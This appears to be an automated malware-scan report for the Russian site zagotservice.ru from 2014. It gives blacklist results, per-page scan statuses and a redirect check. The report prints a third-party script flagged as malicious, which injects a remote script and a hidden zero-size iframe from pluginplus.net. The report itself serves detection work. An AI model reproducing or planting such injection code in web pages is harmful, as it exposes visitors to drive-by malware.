Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zagotservice.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zagotservice.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zagotservice.ru/ | 200 OK Content-Length: 26521 Content-Type: text/html | clean |
http://zagotservice.ru/about | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 09:53:24 GMT Location: / Server: nginx/1.4.7 Content-Length: 0 Content-Type: text/html Set-Cookie: stats=1; expires=Thu, 28-Aug-2014 09:53:24 GMT; path=/; domain=.zagotservice.ru | clean |
http://zagotservice.ru/test404page.js | 404 Not Found Content-Length: 879 Content-Type: text/html | clean |
http://zagotservice.ru/catalog | 200 OK Content-Length: 10678 Content-Type: text/html | clean |
http://zagotservice.ru/price | 200 OK Content-Length: 26460 Content-Type: text/html | clean |
http://zagotservice.ru/news | 200 OK Content-Length: 16139 Content-Type: text/html | clean |
https://pluginplus.net/plugins/system/system_im.js | 200 OK Content-Length: 565 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var script3 = document.createElement('script');
script3.type = 'text/javascript'; document.getElementsByTagName('body')[0].appendChild(script3); script3.src = 'https://pluginplus.net/plugins/system_rek.js'; function statistic_im(){ var script3 = document.createElement('iframe'); document.getElementsByTagName('body')[0].appendChild(script3); script3.style['width'] = '0px'; script3.style['height'] = '0px'; script3.style['border'] = '0px'; script3.src = 'http://pluginplus.net/plugins/statistic/statistic_im.html'; } statistic_im() Antivirus reports:
| ||
http://c.am15.net/preloader7.js | 200 OK Content-Length: 11226 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/mail | 200 OK Content-Length: 12067 Content-Type: text/html | clean |
https://captcha.megagroup.ru/static/captcha.js?2 | 200 OK Content-Length: 4091 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/shared/misc/calendar.gen.js | 200 OK Content-Length: 1224 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/contacts | 200 OK Content-Length: 16553 Content-Type: text/html | clean |
http://zagotservice.ru/foto | 200 OK Content-Length: 11957 Content-Type: text/html | clean |
http://zagotservice.ru/foto?view=689380 | 200 OK Content-Length: 4032 Content-Type: text/html | clean |
http://zagotservice.ru/shared/highslide-4.1.13/highslide.packed.js | 200 OK Content-Length: 25849 Content-Type: application/x-javascript | clean |
http://zagotservice.ru/shared/flowplayer/flowplayer-3.2.9.min.js | 200 OK Content-Length: 16066 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zagotservice.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate, max-age=0
Connection: close
Date: Thu, 21 Aug 2014 09:53:23 GMT
Pragma: no-cache
Server: nginx/1.4.7
Content-Type: text/html; charset=utf-8
Expires: Mon, 11 Aug 2014 03:58:04 GMT
Last-Modified: Mon, 11 Aug 2014 03:58:04 GMT
Set-Cookie: stats=1; expires=Thu, 28-Aug-2014 09:53:23 GMT; path=/; domain=.zagotservice.ru
GET / HTTP/1.1
Host: zagotservice.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate, max-age=0
Connection: close
Date: Thu, 21 Aug 2014 09:53:23 GMT
Pragma: no-cache
Server: nginx/1.4.7
Content-Type: text/html; charset=utf-8
Expires: Mon, 11 Aug 2014 03:58:04 GMT
Last-Modified: Mon, 11 Aug 2014 03:58:04 GMT
Set-Cookie: stats=1; expires=Thu, 28-Aug-2014 09:53:23 GMT; path=/; domain=.zagotservice.ru
Second query (visit from search engine):
GET / HTTP/1.1
Host: zagotservice.ru
Referer: http://www.google.com/search?q=zagotservice.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zagotservice.ru
Referer: http://www.google.com/search?q=zagotservice.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.